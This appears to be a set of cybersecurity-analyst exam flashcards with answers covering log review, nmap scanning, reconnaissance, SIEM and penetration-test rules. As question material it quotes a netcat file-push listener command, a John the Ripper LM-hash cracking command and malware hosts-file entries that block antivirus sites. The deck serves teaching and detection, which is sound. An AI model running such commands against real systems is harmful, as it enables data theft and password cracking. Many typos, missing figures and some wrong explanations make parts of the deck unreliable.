Chris discovers the following entries in /var/log/auth.log What is most likely occurring? A. A user has forgotten their password B.A brute force attack against the root account C.A misconfigured service D.A denial-of-service attack against the root accountqq1
B.A brute force attack against the root account Explanation: Repeated failures from the same host likely indicate a brute-force against the root account
While reviwing Shodan scan data for his organization, Adam finds the following information. What type of system has he discovered? A.A botnet administration system B.A control and data acquisition system C.A noncaching web server D.A NAS
B.A control and data acquisition system Explanation: Adam has discovered a supervisory control and data acquisition system (SCADA). Typically, BAS indicates that the system is used for building automation
Angela is designing her organizations data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela's best design option? A.Administrative virtual machines run on administrator workstations? B.A jump host C.A bastion host D.Use ssh or RDP from administrative workstations
B.A jump host Explanation: A jump host, or jump box, allows for wasier logging of administratibe access and can serve as an additional layer of protection between administrative workstations and the protected network, In this case, Angela's needs are best served by a jump host. Incorrect answers: C. A bastion host are fully exposed to attacks A.Administrative virtual machines can be useful but dont make central auditing quite as east and may allow a compromised virtual machine host to be a problem D.Finally, direct SSH or RDP requires auditing of all administrative workstations and could allow a compromised workstation to cause issues by allowing it to directly connect to the secure network
Lucca wants to identify systems that may have been compromised and are being used for data exfiltrations. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find his behavior? A. A firewall B.A netflow collectior C.A honeypot D.A BGP monitor
B.A netflow collector Explantion: netflows can be used to identify traffic patterns between systems that are atypical or that connect to systems that are known malware or malicious sites. Using his SIEM, Lucca can look for top talkers, behavior or trend-based anomalies, or other correlations that point to an issue
While reviewing Apache logs, Janet sees the following entris as well as hundreds of others from the same source IP. What should Janey report has occurred? [ 21[Jul[2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [ 21[Jul[2017:02:18:35-0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [ 21[Jul[2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [ 21[Jul[2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [ 21[Jul[2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [ 21[Jul[2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 A. A denial-of-service attack B.A vulnerability scan C.A port scan D.A directory traversal attack
B.A vulnerability scan Explanation: Testing for common sample and default files is a common tactive for vulnerability scanners. Janet can reasonably presume that her Apache web server was scanned using a vulnerability scanner
Cassandra's nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown? A.A virtual machine B.A wireless router C.A broadband router D.A print server
B.B.A wireless router Explanation: Since Cassandra is scanning a wireless network and the system is using an IP address that is commonly used for commodity wireless routers her best guess should be that this is a wireless router that can be accessed via ssh and that is providing a web management interface and print services. The OS fingerprinting that nmap proives is not always reliable The VirtualBox match is a false postive in this case. The actual host scanned is an Asus router running open source firmware and additional software
Senios management in Adam's company recently read a number of articles about massive ransomware attacks that successfully targeted organizastions like the one that Adam is a part of. Adam's organization already uses layered security solutions including a border IPS, firewalls between network zones, local host firewalls, antivirus software and a configuration management system that applies recommeneded operating system best practice settings to their workstation. What should Adam recommend to minimize the impact of a similar ransomware outbreak at his organization? A.Honeypots B.Backups C.Anti-malware software D. A next-generation firewall appliance
B.Backups Explanation: In many cases. backups are the best method to minimize the impact of a ransomware outbreak. While prevenatative measures can help, malware packages continue to change more quickly than detective controls like nati-malware software NGFW can react A honeypot wont help Adam prevent ransomware, so it can be easily dismissed when answering this question
WHile reviewing a malware sample, Adam discovers that code inside of it appears to be obfuscated. Which of the following encoding methods is commonly used to prevent code from being easily read by simply opening the file? A.QR coding B.Base64 C.Base128 D.XINT
B.Base64 Explanation: Malware often uses base64 encoding as part of its obfuscation attempts/ There are multiple base64 formats, but online decoders can help quickly check to see whether the obfuscated code is just base64 encoded. Packers and other tools may use multiple methods making it difficult to figure out quickly
Shane wants to conduct an nmap scan of firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use? A.Fragmenting packets B.Changing packet header flags C.Spoofing the source IP D.Appending random data
B.Changing packet header flags Explanation: nmap supports quite a few firewall evasion techniques including spoofing the MAC (hardware) address, appending random data, setting scan delays, using decoy IP addresses, spoofing the source IP or port, modifying the MTU size, or intentionally fragmenting packets
As part of her reconnaissance process for her organizations internal security review, Olivia uses Shodan to search for hosts within her targets IP range. She discovers the following Shodan entry listing for one of her targets devices. What should she do with this information? Cisco Configuration Professional is installed on this device. This feature requires the one-time use of the username "cisco" with the password "cisco" These default credentials have a privilege level of 15 A.Activate the incident response process B.Contact the device administrator C.Log in to validate the finding D.Nothing, because this is a false positive
B.Contact the device administrator Explanation: Olivia's first action should be to contact the device administrator. There is no indication that the device has been compromised and logging in to validate the finding is not typically part of a reconnaissance process
Greg configures his next-generation firewall security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Gren controls that advises them they were prevented from visiting a malicious site. What is this technique known as? A.DNS masquerading B.DNS sinkholing C.DNS re-sequencing D.DNS hierarchy revision
B.DNS sinkholing Explanation: Greg's implementation is a form of DNS sinkholing that sends traffic to an alternate address, which acts as the sinkhole for traffic that would otherwise go to a known bad domain
While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network? Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Pacets Byte Flows 2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151- >10.2.2.3:443 9473640 9.1 G 1 2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443- >10.1.1.1:1151 8345101 514 M 1 A.A web browsing session B.Data exfiltration C.Data infiltration D. A vulnerability scan
B.Data exfiltration Explanation: Large data flows leaving an organizations network may be a sign of data exfiltration by an advanced persistent threat. Using HTTPs to protect the data while making it look less suspicious is a common technique
Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical iteams needed to uniquely identify the majority of Americans? A.Height, weight and eye color B.Date of birth, gender and zip code C.Zodiac sign, gender, and zip code D.Age,height, and weight
B.Date of birth, gender and zip code Explanation: Studies have known that 87 percent of the US population can be uniquely identified with their date of birth, gender, and zip code. If Charles can obtain this information, he has a very high chance of identifying the right individual
After Charles completes a topology discovery scan of his local network, he sees the Zenmap topology shown here, What can Charles determine from the Zenmap topology view? A.There are five hosts with port security enabled B.DemoHost2 is running a firewall C.DemoHost4 is running a firewall D.There are four hosts with vulnerabilities and seven hosts that do not have vulnerabilities
B.DemoHost2 is running a firewall Explanation: Zenmap topologies show a number of pieces of useful information. The icons next to Demo2Host2 show the following infomration: a relative assessment of how many ports are opeb, with white showing "not scanned," green showing less than three open ports, yellow showing three to six open ports, red showing more than six open ports. Next, it shows a firewall is enabled Finally the lock icon shows that some ports are filtered. In this scan, only DemoHost2 has been identified by nmap as currently running a firewall, which doesnt mean that other hosts are not actually runing firewalls
Alice is conducting a penetration test of a client's system. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration test process is she currently in? A.Social engineering B.Discovery C.Analysis D.Social media profiling
B.Discovery Explanation: The NIST SP 800-115 guide describes four penetration testing phases: planning, discovery, attack, reporting. Alice is conducting a discovery activity. During this phase she might also scan systems and networks, perform passive intelligence gathering, or use tools to gather additional information about her target
What two phases of the NIST penetration testin cycle are often repeated during a test? A.Planning and discovery B.Discovery and attack C.Planning and attack D.Discovery and reporting
B.Discovery and attack Explanation: As attacks succeed, they will often create additional opportunities for discovery, resulting in more attacks. Planning the test itself, as well as the final reporting phase, should occur only once per penetration test
While reviewing email logs for his domains email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order" [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] This behavior continues for thousand of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered? A.Brute force B.Domain harvesting C.Domain prbe D.Email list builder
B.Domain harvesting Explanation: This type of probe is known as domain harvesting and relies on message rejection error messages to help the individual running the probe to determine which email accounts actually exist Rick may want to disable delivery recepits, disable nondeliverable responses, or investigate more advanced techniques like false nondeliverable responses or recipient filtering and tar pitting
Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organizations staff. If she wants to review the metadata from the photos, what tool can she use to do so? A.Strings B.Exifool C.Wireshark D.Stegdetect
B.Exiftool Explanantion: Exiftool provides access to image and document metadata, including information about the camera, geotagging, time and date information, and a variety of other useful metadata if it is present. Incorrect answers: Strings is useful for pulling text from files but does not provide usefully formatted metadata Wireshark is a packet capture utility, and stegdetect is used to detect steganographically concealed data in files
Ian's company has an internal policy requiring that they perform regular port scans for all of their servers. Ian has been part of a recent effort to move his organizations servers to an infrastructure as a service provider. What change will Ian most likely need to make to his scanning efforts? A. Change scanning software B.Follow the service providers scan policies C .Sign a security contract with the provider Discontinue port scanning
B.Follow the service providers scan policies Explanation: Most infrastructure-as-a-service providers will allow their customers to perform security scans as long as they follow the rules and policies around such scans. Ian should review his vendors security documentation and contact them for details if he has questions
The company that Lauren works for is making significant investments in infrastrucuture-as-a-service hosting to replace its traditional data center. Members of her organizations management have expressed concerns about data Remanence when Lauren's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team do to avoid this concern? A.Zero-wipe drives before moving systems B.Use full-disk encryption C.Use data masking D.Span multiple virtual disks to fragment data
B.Full disk encryption. Explanation: Laurens team should use full disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. While many cloud providers have implemented technology to ensure that this wont happen. Lauren can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure A.Using a zero wipe is often impossible because virtual environments may move without her teams intervention C.Data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed D.Spanning multiple virtual disks will still leave the data accessible, albeit possibly in fragmeneted form
After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to conduct the test? A.Port scan the target systems B.Get sign-off on the document C.Begin passive fingerprinting D.Notify law enforcement
B.Get sign-off on the document Explanation: While it may be tempting to start immediately after finishing scoping, Jessica's next step should be to ensure that she has appropriate sign-off and agreement to the scope, timing and effort invovled in the test
Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool? A.Signature based B.Heuristic based C.Trend based D.Availability based
B.Heuristic detection Explanation: Heuristic detection methods run the potential malware application and track what occurs. This can allow the antimalware tool to determine whether the behaviors and actions of the program match those common to malware, even if the file does not match the fingerprint of known malware packages
While gathering DNS information about an organization, Chris discovered multiple AAAA records. What type of reconnaissance does this mean Chris may want to consider? A.Second-level DNS queries B.IPv6 scans C.Cross-domain resolution D.A CNAME verification
B.IPv6 scans Explanation: AAAA records are IPv6 address records This means that Chris may also want to scan for hosts that are available via IPv6 gateways. The rest of the answers here are made up for this question
Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this? A.Use sha1sum to generate a hash for the file and write a script to check it peridiocally B.Install and use Tripwire C.Periodically check the MAC information for the file using a script D.Encrypt the file and keep the key secret so that file cannot be modified
B.Install and use Tripwire Explanation: Tripwire and similar programs are designed to monitor a file for changes and to report on changes that occurs. They rely on file fingerprints (hashes) and are designed to be reliable and scalable. Kathleen's best bet is to use a tool designed for the job, rather than to try to write her own
Which of the three key objectives of cybersecurity is often ensure by using techniques like hashing and the use of tools like Tripwire? A.Confidentiality B.Integrity C.Identification D.Availability
B.Integrity Explanation: The three objectives of cybersecurity are confidentiality, integrity, and availability. Hashing and the use of intergrity monitoring tools like Tripwire are both techniques used to preserve integrity; in face, file integrity monitoring tools typically use hashing to verify that files remain intact and unchaged
While application vulnerability scanning one of her target organization web servers, Andrea notices that the servers hostname is resolving to a cloudflare.com host. What does Andrea know about her scan? A.It is being treated like a DDoS attack B.It is scanning a CDN-hosted copy of the site C.It will not return useful information D.She cannot determine anything about the site based on this information
B.It is scanning a CDN-hosted copy of the site Explanation: CloudFlare, Akamai and other content distribution networks use a network of distributed servers to serve information closer to requesters. In some cases, this may make parts of a vulnerability scan less useful, while others may remain valid. Here,Andrea simply knows that the content is hosted in a CDN and that she may not get all of the information she wants from the scan
Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwors being used to allow access to his organizations systems. Which of the following technologies should he recommend? A.Captive portals B.Multilfactor authentication C.VPNs D.OAuth
B.Multilfactor authentication Explanation: Multifactor authentication helps reduce the risk of a captured or stolen password by requiring more than one factor to authenticate. Attackers are less likely to have also stolen a token, code or biometric factor
Angela wants to gather detailed information about the hosts on a network passively. If she has access to a Wireshark pcap file from the network, which of the following tools can she use to provide automated analysis of the file? A.ettercap B.NetworkMiner C.Sharkbait D.dradis
B.NetworkMiner Explanation: Angela can use NetworkMiner, a tool that can analyze existing packet capture files to do OS identification and which identifies and marks images, files, credentials, sessions, DNS queries, parameters and a variety of other details. Ettercap can perform passive TCP stack fingerprinting but is primarily a man-in-the-middle tool dradis is an open source collaboration platform for security teams SharkBait is not a security tool or term
Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this? A.Primary documentation B.OEM documentation C.Crowd-sourced documentation D.System documentation
B.OEM documentation Explanation: Original equipment manufacturer (OEM) documentation is provided by the builder or creator of the equipment, device, or software. It typically includes information about default and recommended settings. Most organizations use OEM and expert consensus recommended configurations that have been modified to match the requirements of their environment
Allan's nmap scan includes a line that starts with cpe:/o. What type of information should he expect to gather from the entry? A.Common privilege escalation B.Operating system C.Certificate performance evaluation D.Hardware identification
B.Operating system Explanation: nmap provides both hardware and operating system identification capabilities as part of its common platform enumeration features .cpe:/o indicates operating system identification, and cpe:/h indicates hardware identification
Geoff's remote scans of a target organization's class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather additional reconnaissance information about the organization's network, which of the following scanning techniques is most likely to provide additional detail? A.Use a UDP scan B.Perform a scan from on-site C.Scan using the -p 1-65535 flag D.Use nmap's IPS evasion techniques
B.Perform a scan from on-site Explanation: Performing a scan from an on-site network connection is the most likely to provide more detail. Many organizations have a strong external network defense but typically provide fewer protections for on-site network connections to allow internal users to access services. It is possible that the organization uses services found only on less common ports or UDP only services, but both of these options have a lower chance of being true than for an on-site scan to succeed. nmap does provide firewall and IPS evasion capabilities but that is also a less likely scenario
Which of the following capabilities is not a typical part of an SIEM system? A.Alerting B.Performance management C.Data aggregation D.Log renetion
B.Performance management
CHalres received a pcap file from a system administrator at a remote site who was concerned about the traffic it showed. What type of behavior should Charles report after his analysis of the file? A.A DOS attack B.Port scanning 3.A DDoS attack 4.Service access issues
B.Port scanning Explanation: Charles should immediately notice that all traffic comes from one host (10.100.25.14) and is sent to the same host (10.100.18.12). All the traffic shown is TCP SYNs to well-known ports. Charles should quickly identify this as a SYN-based port scan
Lauren is a security analyst who has been tasked with performing nmap scans of her organizations network. She is a new hire and has been given this logical diagram of the organizations network but has not been provided with any additional detail. Lauren wants to determine what IP addresses to scan from location A. How can she find this information? A.Scan the organizations web server and then scan the other 255 IP addresses in its subnet B.Query DNS to find her organizations registered hosts C.Contact ICANN to request the data D. Use traceroute to identify the network that the organizations domain resides in
B.Query DNS to find her organizations registered hosts Explanation: Laurens best option from this list is to query DNS using WHOIS. She might also choose to use a BGP looking glass, but most of the information she will need will be in WHOIS If she simply scans the network the web server is in, she may end up scanning a third-party hosting provider, or other systems that arent owned by her organization in the /24 subnet range. Incorrect answers: Contacting ICANN isnt necessary with access to WHOIS, and depending on what country Lauren is in, ICANN may not have the data she wants. Finally, using traceroute will only show the IP address of the system she queries; she needs more data to perform a useful scan in most instances
During a regulary scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system? A.MySQL B.RDP C.TOR D.Jabber
B.RDP Explanation: Port 3389 is the service port for RDP. If Fred doesnt expect this port to be open on his point-of-sale terminals, he should immediately activate his incident response plan
After receiving a penetration test report, Rick has decided to implement anti-harvesting techniques for his organizations DNS. Which of the following sets of techniques is best suited to preventing bulk and automated information gathering? A.CAPTCHA and proxy services B.Rate limiting and CAPTCHA C.Not publishing TLD zone files and blacklisting D.CAPTCHA and blacklisting
B.Rate limiting and CAPTCHA Explanation: Both using CPATCHAs to prevent bots and implementing a reasonable rate-limiting policy can limit the bulk collection of data. Privacy and proxy services help keep registrant data private./ BLacklisting ise useful to temporaily block abusive IP addresses or networks but can result in long-term issues if it is broadly used ot if a legitimate site is blocked. FInally, not publishing TLD zone files can help limit WHOIS abuse, but not all TLDs can avoid doing so
The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment? A.Use a different scanning tool B.Rely on vendor testing and audits C.Engage a third-party tester D.Use a VPN to scan inside the vendor's security perimeter
B.Rely on vendor testing and audits Explanation Most SaaS providers do not want their customers conduction port scans of their services, and many are glad to provide security assertions and attestiations including audits, testing information, or contractual language that addresses potential security issues. Using a different scanning tool, engaging a third-oarty tester, or even using a VPN are not typically valid answers in a scenario like this
Which of the following items is not one of the three important rules that should be established before a penetration test? A.Timing B.Reporting C.Scope D.Authorization
B.Reporting It is critical to determine when a penetration test will occur and what systems, networks, personnel, and other targets are part of the test and which are not. In addition, testers must have the proper permission to perform the test. The content and format of the summary are important but not critical to have in place before the penetration test occurs
Lauren is contact by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing? A.Active hours B.Required reboots C.Automatic updates D.Network time synchronization
B.Required reboots Explanation: Windows 10 has quite a few built-in options for reboots after patches, but if users are logged in and a forced restart is not set via Group Polict, patches may not be installed for a very long time. Lauren should work with system administrators and user groups to ensure that a reasonable reboot policy can be put into place
Fred has been taked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a users job? A.Time-based B.Rule-based C.Role-based D.Location based
B.Rule-based Explanation: NAC solutions that implement employee job function- based criteria often use time-based controls to ensure that employees have access only when they are supposed to be working, role-based criteria because of their duties, Location-based rules to ensure that they access networks only where they work Rule-based criteria typically focus on system health and configuration, thus focusing more on the computer or software than the user
Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicy available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance? A.Use the worldwide nmap database B.Search for his domain in Shodan C.Use the OpenVAS central vulnerability data repository D.Check against the CVE database for his domain
B.Search for his domain in Shodan Explanation: Of these answers, only Shodan provides a searchable listing of vulnerable hosts including details of the system that was scanned. Incorrect Answers: OpenVAS, CVE, and nmap do not provide central databases of vulnerable systems
Lauren inputs the following command on a linux system: '#echo 127.0.0.1 example.com >> /etc/hosts What has she done? A.She has added the system on the allows hosts file B.She has routed traffic for the example.com domain to the local host C.SHe has routed local host traffic to example.com D.She has overwritten the hosts file and will have deleted all data except this entri
B.She has routed traffic for the example.com domain to the local host Explanation: Lauren has added an entry to the hosts file that routes all traffic for example.com to her local address. This is a useful technique to prevent a system from contacting a malicious host or domain or to simply prevent a nontechnical user from visiting specific sites or domains
Scott is part of the white team who is overseeing his organization's internal red and blue teams during an exeercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report? A.The blue team has succeeded B.The red team is violating rules of engagement C.The red team has succeeded D.The blue team is violating the rules of engagement
B.The red team is violating rules of engagement Explanation: This capture shows SQL injection attacks being attempted. SInce this is the reconnaissance phase, the red team should not be actively attempting to exploit vulnerabilities and has violated the rules of engagement
What is a document that lists sensitive data-handling rules, contact inbformation, black-box testing, and status meeting schedules called during a penetration test? A.The "get out of jail free" card B.The rules of engagement C.Executive sign-off D.A penetration test standard
B.The rules of engagement Explanation: The rules of engagement are the rules that a penetration test or other security assessment are conducted under. They typically list what type of assessment, when, where and how it will be conducted; what communication and notification will be done; and other details that are critical to ensure that the assesment is done in a way that meets the organizations needs
In his role as the SOC operator, Frankn regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administratos manager. At the next wseekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What will most likely happen? A. The server administrator blocked the scanner with a firewall B. The server was patched C.The vulnerability plug-ins were updated and no longer report false positives D.The system was offline
B.The server is showing normal ports for a Windows file server. It is most likely that Franks escalation to management resulted in action by the server administrator
While reviewing logs from users with root privileges on an administrative jump box,Alex discovers the following suspicious command: 'nc -1 -p 43501 < example.zip' A.The user set up a reverse shell running as example.zip B.The user set up netcat as a listener to push example.zip C.The user set up a remote shell running as example.zip D.The user set up necat to receive example.zip
B.The user set up netcat as a listener to push example.zip Explanation: The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.
Alice believes that one of her users may be taking malicious actions on the system she has access to. When she walks past her user's desktop, she sees the following commands on the screen: 'user12@workstaion: /home/user12# ./john -worldfile:/home/user12/mylist.txt -format:lm hash.txt What is the user attempting to do? A.They are attempting to hash a file B.They are attempting to crack hashed passwords C.They are attempting to crack encrypted passwords They are attempting a pass-the-hash attack
B.They are attempting to crack hashed password Explanation: Alice's suspicious user appears to be attempting to crack LANMAN hashes using a customer word list. They key clues here are the john application, the LM hash type, and the location of the word list
While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here: 0.0.0.0 symantec.com 0.0.0.0 mcafee.com 0.0.0.0 microsoft.com 0.0.0.0 kapersky.com Why would the malware make this change? A. To redirect 0.0.0.0 to known sites B.To prevent antivirus updates C.To prevent other attackers from compromising the system D.To enable remote access to the system
B.To prevent antivirus updates Explanation: Changing the hosts file has been used by various malware packages to prevent updates by stopped DNS resolution of the antivirus updates update server. Lauren should check to see whether the antivirus on the system is up-to-date but will probably need to recommend a rebuild or reinstallation of the system
Every year, Alice downloads and reads a security industry published list of all the types of attacks, comrpomises, and malware events that have occurred, that are becoming more prevalent, and that are decreasing in occurrence. What type of analysis can she perform using this information? A.Anomaly B.Trend C.Heuristic D.Avalability
B.Trend Explanation: Alice can use trend analysis to help her determine what attacks are most likely to target her organization and then take action based on the trends that are identified
Senior C-level excutives at the organization that Alex works for have received targeted phishing messages that include a fake organizational login page link and a message that states that their passwords were inadvertently reset during a scheduled maintenance window. What type of attack should Alex describe in his after action report? A.Tuna phishing B.Whaling C.Spear phsihing D.SAML phishing
B.Whaling Explanation: Whaling is a term used to specifically denote phishing attacks aimed at high-ranking officers of a company. Spear phishing describes phishing messages apparently sent by an individual or organization that the recipient is familiar with and leverages trust in that organization. Neither tuna phishing nor SAML phishing are industry terms
Nathan has been asked to monitor and manage the environment in which a cybersecurity exercise is conducted. What team is he on? A.Red team B.White team C.Blue team D.Black team
B.White team Explanation Nathan is part of the white team, which manages the environment. The red team attacks The blue team defends Black team is not a term that is commonly used in this context, but some organizations identify purple and green teams (often with varying descriptions for their responsibilities, which is admittedly confusing
Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting? A.DNS record enummeration B.Zone transfer C.Reverse lookup D.Domain brute forcing
B.Zone transfer Explanation: If Chris can perform a zone transfer, he can gather all of the organizations DNS information, including domain servers, host names, MX and CNAME records, time to live records,zone serial number data, and other information. THis is the easiest way to gather the most information about an organization via DNS if it is possible. Unfortunately, for penetration testers (and attackers), few organizations allow untrusted systems to perform zone transfers
What services will the following nmap scan test for? 'nmap -sV -p 22,25,53,389 192.168.2.50/27' A.telnet, SMTP, DHCP, MS-SQL B.ssh, SMTP,DNS,LDAP C.telnet,SNMP,DNS, LDAP D.ssh, SNMP, DNS, RDP
B.ssh, SMTP,DNS,LDAP Explanation: This nmap scan will scan for ssh (22) SMTP (25), DNS (53) and LDAP (389) on their typical ports. If the services are running are running on an alternate port, this scan will completely miss those and any other services
What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop? A.ps B.top C.proc D.load
B.top Explanation: The top command will show a dynamic, real-time list of running processes. If Amanda runs this, she will immediately see that two processes are consuming 99 percent of a CPU each and can see rhe command that ran the program
Chris wants to determine what TCP ports are listening on a Windows system. What is his best option to determine this from the command line? A.Use arp -a B.Use nestat -ap C.Use nmap -t 127.0.0.1 $.There is not a Windows command to do this
B.use netstat -ap Explanation: netsta can be used to list listening ports. The -a flag displays all listening ports The -p flag will also show pgrams such as Time_wait, Established, CLose_wait
Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?
C.
Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B? A. An IPS B.An IDS C.A HIPS D.A HIDS
C. A HIPS Explanation: When endpoints are connected without a network control point between them, a host-based solution is required. In this case, Lucca's specific requirement is to prevent attacks rather than simply detect them, meaning that a HIPS is required to meet his needs. Many modern products combine HIPS capabilities with other features such as data loss prevention and system compliance profiling, so Lucca may end up with additional useful capabilities if he selects a product with those features
Adam's port scan returns results on sic TCP ports: 22,80,443,515,631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess? A.A web server B.An FTP server C.A printer D.A proxy server
C. A printer Explanation: While the first three ports are common to many of the devices listed, TCP 515 is the LPR/LPD port 631 is the IPP port commonly used by many print servers TCP is the RAW or direct, IP port. While this could be another type of device, it is most likely a network connected printer
Charles wants to use active directory techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria? A.Google searching B.Using a Shodan Search C.Using DNS reverse lookup Querying a PGP key server
C. Using DNS reverse lookup Explanation: DNS reverse lookup is an active technique. DNS reverse lookup returns the hostname of an IP address. Incorrect answers: A.&B. Google and Shodan are both search engines D.Querying a PGP key server- While a PGP key server does not interact with the target site and is considered passive reconnaissance. If you're not immediately familiar with a terchnique or technology, you can often reduce the possible options. Here, ruling out a Google search or querying a PGP server are obviously not active techniques, and Shodan also says it is a search, making a DNS reverse lookup a good guess, even if you're not familiar with it
Use the following scenario for the question 37 through 39: While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time? A.Heuristic B.Behavior C.Availability D.Anomaly
C.Availability Explanation: Availability analysis targets whether a system or service is workibg as expected. While a SIEM may not have direct availability analysis capabilities, reporting on when logs and other data are no received from source systems can help detect outages Ideally, Lucy's organization should be using system monitoring tools that can alarm on availability issues as well as common system problems such as memory,network,, disk or CPU usage
nmap provides a standardized way to name hardware and software that it detects. What is this called? A.CVE B.HardwareEnum C.CPE D.GearScript
C.CPE Explanation: nmap;s Common Platform Enummeration (CPE) is a standardized way to name applications, operating systems, and hardware. CPE output starts with cpe:/a for applications, /h for hardware, and /o for operating system
After a series of compromised accounts led to her domain being blacklisted, Lauren has been asked to restore her company's email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully? A.Migrate her company's SMTP servers to new IP addresses B.Migrate to a cloud email hosting provider C.Change SMTP headers to prevent blacklisting D.Work with the blacklisting organizations to get removed from the list
C.Change SMTP headers to prevent blacklisting Explanation: While some blacklists use entire IP ranges, changing IP addresses for SMTP servers is often a valid quick fix. Some organizations even discover that one server has been blacklisted and others in their cluster have not been. Migrating to a cloud provider or working with the blacklisting organizations can help, and online validation tools can help Lauren quickly check which lists her organization is on. Changing SMTP headers wont help
When Charleen attempts to visit a website, she receives a DNS reponse from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred? A.DNS brute forcing B.ARP spoofing C.DNS poisoning D.MAC spoofing
C.DNS poisoning Explanation: DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to alternate IP addresses. This may be intentional if the DNS server owner wants to ensure that specific sites are blocked, but it can also be leveraged by attackers who manage to either take control of the DNS server or who manage to spoof or modify DNS updates
While Greg was performing a port scan of critical server system, the system administrators at his company observed the behavior shown here in their network management software suite. What action should Greg take after he is shown in this chart? A.Increase the number of concurrent scans B.Decrease the number of ports scanned C.Decrease the number of concurrent scans D.Increase the number of ports scanned
C.Decrease the number of concurrent scans Explanation: Greg is seeing a significant increase in network latency for the host he is scanning, which could result in performance issues for users of the server. Greg needs to slow down his scan, which can be accomplished by reducing the number of concurrent scans
Frank is creating the scope worksheet for his organizations penetration test. Which of the following techniques is not typically included in a penetration test? A.Reverse engineering B. Social engineering C.Denial-of-service attacks D.Physical penetration attempts
C.Denial-of-service attacks are rarely part of penetration test because of the risk they create for the target organization. In specific cases where DoS attacks are permitted, they are sometimes aimed at a nonproduction instance or network to test DoS handling techniques
Angela captured the following packets during reconnaissnace effort run by her organizations red team. What type of information are they looking for? A.Vulnerable web applications B.SQL injection C.Directory traversal attacks D.Passwords
C.Directory traversal attacks Explanation: Angela has captured part of Nikto scan that targets a vulnerable .asp script that allows directory traversal attacks If it was successfulm the contents of files like boot.ini or /etc/passwd would be accessble using the web server
Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on his network. Which of the following practices will help mitigate this risk? A.Implement an IPS B.Implement a firewall C.Disable promiscuous mode for NICs D.Enable promiscuous mode for NICs
C.Disable promiscuous mode for NICs Explanation: Passive fingerprinting relies on the ability of a system to capture traffic to analyze. Preventing systems from suing promiscuous mode will provide attackers with very little data when performing passive fingerprinting. Both intrusion prevention systems and firewalls can help with active fingerprinting but will do nothing to stop passive fingerprinting
